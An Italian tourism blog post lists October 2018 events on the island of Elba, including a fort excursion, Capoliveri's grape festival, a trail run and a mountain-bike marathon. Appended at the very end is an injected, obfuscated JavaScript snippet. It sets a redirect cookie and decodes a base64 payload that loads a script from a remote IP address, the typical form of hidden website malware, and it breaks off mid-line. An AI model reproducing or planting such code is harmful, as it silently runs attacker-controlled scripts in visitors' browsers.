Anche quest’anno con l’estate non finisce certo la voglia di divertirsi e le attività a cui dedicarsi all’Elba.
Nontastente le giornate siano ancora molto belle in Ottobre molti preferiscono dedicarsi al trekking, allo sport, alla natura ed i profumi del sottobosco.
Ottobre 2018 è costellato di eventi, sagre e colori..
Ecco solo alcuni tra i prossimi appuntamenti
Forti a cavallo tra il 700 e l’800: dagli inglesi ai francesi in data 4 ottobre 2018, a Portoferraio (Forte Inglese)
Escursione con partenza da Forte Inglese alle ore 16.30 fino alla sommità di Monte Bello. Rientro a Forte Inglese e visita guidata al complesso fortificato. Il Forte di Monte Bello fu edificato per opera di Napoleone nel 1802. Il complesso fu al centro della continua attenzione di Napoleone.
Festa dell’Uva a Capoliveri dal 5 al 7 Ottobre
Si comincia venerdì 5 ottobre, dalle ore 19 con i giochi della Vendemmia e dell’Antico Borgo, con delle novità particolari che da quest’anno vedranno ancor più che in passato il coinvolgimento dei bambini.
Le anticipazioni che arrivano dagli organizzatori parlano di cambiamenti nei giochi, concepiti per essere disputati solo da giovani contradaioli di ogni rione, eliminando le gare “per adulti” come il Palio delle Botti e la Corsa dei Tini.
Il sabato sarà come sempre la giornata dedicata all’enogastronomia, con la possibilità per gli ospiti di Capoliveri di degustare i vini del Consorzio Produttori Elba Doc e Docg, ma soprattutto con la proposta enogastronomica di ognuno dei 4 rioni, in tema con quello che poi verrà rappresentato la domenica in piazza e nel proprio territorio all’interno del borgo medievale.
E poi, la gara più attesa. Fosso, Baluardo, Torre e Fortezza torneranno a sfidarsi per aggiudicarsi il Bacco e vincere la tre giorni di gare, giochi ed enogastronomia portando in scena la Capoliveri di un tempo, ciascuna con un tema inedito e segreto che sarà svelato solo domenica 7 ottobre, dopo l’ingresso in piazza – previsto come sempre alle 10,30 – con la sfilata e la prima rappresentazione scenica che sarà presentata a pubblico e giuria.
Poi i giurati, accompagnati dai capo-rione con giornalisti ed organizzatori al seguito, entreranno all’interno dei rioni ed esprimeranno il loro voto su allestimenti, costumi, ricette e tradizione che ciascuno avrà saputo meglio interpretare.
Miniera in Trail 14 Ottobre Rio Marina
Miniera in Trail è un modo unico e originale per correre in mezzo a uno dei luoghi più particolari del mondo. In nessun posto sul nostro Pianeta sono concentrati tanti giacimenti di minerali puri come a Rio Marina.
La corsa offre delle suggestioni immense. Attraversa le sconfinate cave a cielo aperto che per secoli hanno cambiato il profilo alla montagna, sfiorano il mare più verde del tirreno settentrionale nelle falesie ancora incontaminate, e ti consentono di essere perfettamente inserito nell’ambiente dell’Isola, che costeggia la costa toscana in una sorta di magico fiordo.
Conquistadores Cup dal 19 al 21 ottobre 2018 (Rete Sentieristica Porto Azzurro)
La Conquistadores Cup è una Gara Marathon di Mountain Bike che si svolge nel bellissimo entroterra a confine col mare tra le splendide colline che costituiscono lo spettacolare scenario per cui è conosciuto il paese di Porto Azzurro e l’Isola d’Elba.
Il Tracciato della Conquistadores Cup ha una lunghezza di circa 30 km e oltre 1000 metri di dislivello.
Il percorso lungo (MARATHON) è denominato d’Alarcon in onore dei veri conquistadores spagnoli che hanno regnato in passato sul territorio di Porto Azzurro e sulla nota Fortezza Spagnola, misura 59,6 km su 2 giri del tracciato. Sul percorso sono presenti salite molto impegnative anche se relativamente brevi con pendenze che spesso superano il 20%, divertentissime discese tecniche, passaggio sulla spiaggia di Terranera, scalinate in centro abitato,ed altri single track che rendono la gara molto impegnativa e allo stesso tempo affascinante. Il percoso della Conquistadores Cup consente sempre di ammirare il mare, abbiamo infatti scelto di attraversare con la Mountain Bike tutti i luoghi piu belli e significativi del territorio di Porto Azzurro.
Resta con noi per scoprire insieme i prossimi eventi 🙂
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘